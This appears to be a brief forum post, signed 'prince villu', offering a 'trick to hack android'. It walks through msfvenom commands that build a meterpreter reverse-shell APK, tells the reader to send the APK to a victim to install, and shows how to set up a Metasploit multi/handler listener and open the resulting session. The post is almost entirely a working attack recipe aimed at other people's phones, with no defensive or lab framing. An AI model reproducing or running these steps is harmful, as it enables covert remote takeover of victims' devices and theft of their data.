hi here is latest trick to hack android

you can access victim android system

access all func

here is :

open your kali2

#msfvenom -p android/meterpreter/reverse_tcp LHOST=[your publice ip or private ip] LPORT=8888 R > /root/Desktop/yourapkfile.apk

here apk are create which save at Desktop

uplad ur apk and send it to target


open terminal type msfconsole

#use multi/handler/
#set PAYLOAD android/meterpreter/reverse_tcp
#show options

you need create LHOST and LPORT

open new terminal for find LHOST it is your ip


now you get ip put it in LHOST

at msfconsole

# set LHOST ip
#set LPORT 8888


now done

but 1stly ur android.apk should send to victim and he should install on his device


after it you will get meterpreter console

#sessions -i 1

check session active or not

or type help


is show list chose any and attack on your victim 


same comands:



im prince villu